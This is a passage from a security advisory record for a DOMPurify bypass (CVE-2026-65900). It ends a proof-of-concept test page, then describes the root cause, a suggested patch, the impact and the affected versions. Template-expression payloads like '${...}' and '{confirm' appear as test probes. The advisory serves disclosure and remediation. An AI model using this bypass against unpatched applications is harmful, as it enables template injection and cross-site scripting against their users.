!sanitized.includes('${') && !sanitized.includes('{confirm');\n  if (blocked) {\n    setBadge('ctrl', 'BLOCK');\n    log('Control: String output correctly stripped the expression. Output: ' + sanitized, 'ok');\n  } else {\n    setBadge('ctrl', 'PASS'); // unexpected\n    log('Control: UNEXPECTED - expression survived string output path: ' + sanitized, 'fail');\n  }\n}\n\n// ── Run all ────────────────────────────────────────────────────────────────\n\nfunction runAll() {\n  document.getElementById('log').innerHTML = '';\n  xssConfirmed = false;\n  document.getElementById('xss-banner').style.display = 'none';\n  log('=== Starting full test run ===', 'info');\n  runPoC1();\n  runPoC2();\n  runPoC3();\n  runControl();\n  log('=== Test run complete ===', 'info');\n}\n\u003c/script\u003e\n\n\u003c/body\u003e\n\u003c/html\u003e\n\n\n```\n\n\n---\n\n## Root Cause\n\n`_scrubTemplateExpressions` (`src/purify.ts:1115`) does not recurse into `\u003ctemplate\u003e.content`:\n\n```ts\nconst _scrubTemplateExpressions = function (node: Element): void {\n  node.normalize(); // Does NOT normalize inside \u003ctemplate\u003e.content (DOM spec)\n  const walker = createNodeIterator.call(\n    node.ownerDocument || node,\n    node,            // NodeIterator does NOT enter \u003ctemplate\u003e.content\n    NodeFilter.SHOW_TEXT | NodeFilter.SHOW_COMMENT |\n    NodeFilter.SHOW_CDATA_SECTION | NodeFilter.SHOW_PROCESSING_INSTRUCTION,\n    null\n  );\n  // Scrubs nodes it finds, but never sees \u003ctemplate\u003e content\n};\n```\n\nThe fix is to extend `_scrubTemplateExpressions` to explicitly recurse into `\u003ctemplate\u003e.content`, mirroring the approach already used by `_sanitizeShadowDOM` (`src/purify.ts:1753`):\n\n```ts\nif (_isDocumentFragment(shadowNode.content)) {\n  _sanitizeShadowDOM(shadowNode.content); // already handles recursion\n}\n```\n\n### Suggested Patch Direction\n\n```ts\nconst _scrubTemplateExpressions = function (node: Element): void {\n  node.normalize();\n  const walker = createNodeIterator.call( /* existing args */ );\n\n  // ... existing scrub loop ...\n\n  // NEW: recurse into \u003ctemplate\u003e.content, mirroring _sanitizeShadowDOM\n  const templates = (node as Element).querySelectorAll?.('template') ?? [];\n  arrayForEach(Array.from(templates), (tmpl: HTMLTemplateElement) =\u003e {\n    if (_isDocumentFragment(tmpl.content)) {\n      _scrubTemplateExpressions(tmpl.content as unknown as Element);\n    }\n  });\n};\n```\n\n---\n\n## Impact\n\n**Who is affected:** Applications that use DOMPurify with `SAFE_FOR_TEMPLATES: true` combined with `RETURN_DOM: true`, `RETURN_DOM_FRAGMENT: true`, or `IN_PLACE: true`, whose downstream template engine processes `\u003ctemplate\u003e` element content.\n\n**What an attacker can achieve:** Inject arbitrary template expressions (`${...}`, `{{...}}`, `\u003c%...%\u003e`) into the sanitized DOM output inside `\u003ctemplate\u003e` elements. If the consuming template engine evaluates these expressions, this leads to **template injection**, which in server-side contexts can escalate to **Remote Code Execution** and in client-side contexts to **Cross-Site Scripting**.\n\n### Preconditions for Exploitation\n\n| Precondition | Notes |\n|---|---|\n| `SAFE_FOR_TEMPLATES: true` | Non-default - must be explicitly set |\n| `RETURN_DOM: true` or `IN_PLACE: true` | Non-default - must be explicitly set |\n| Template engine processes `\u003ctemplate\u003e.content` | Application-dependent |\n\n### What Is NOT Affected\n\nThe **string output path (default)** is not affected. The final regex scrub at `src/purify.ts:2067–2071` operates on the serialized HTML string, where the injected expression is visible and stripped:\n\n```ts\n// src/purify.ts:2067 - only runs on string output, not DOM output\nif (SAFE_FOR_TEMPLATES) {\n  arrayForEach([MUSTACHE_EXPR, ERB_EXPR, TMPLIT_EXPR], (expr: RegExp) =\u003e {\n    serializedHTML = stringReplace(serializedHTML, expr, ' ');\n  });\n}\n```","aliases":["CVE-2026-65900"],"modified":"2026-07-23T14:34:40.119572Z","published":"2026-06-15T20:02:40Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-79"],"severity":"LOW","github_reviewed":true,"github_reviewed_at":"2026-06-15T20:02:40Z"},"references":[{"type":"WEB","url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-gvmj-g25r-r7wr"},{"type":"PACKAGE","url":"https://github.com/cure53/DOMPurify"}],"affected":[{"package":{"name":"dompurify","ecosystem":"npm","purl":"pkg:npm/dompurify"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.0.0"},{"fixed":"3.4.8"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.4.7","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-gvmj-g25r-r7wr/GHSA-gvmj-g25r-r7wr.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"}]}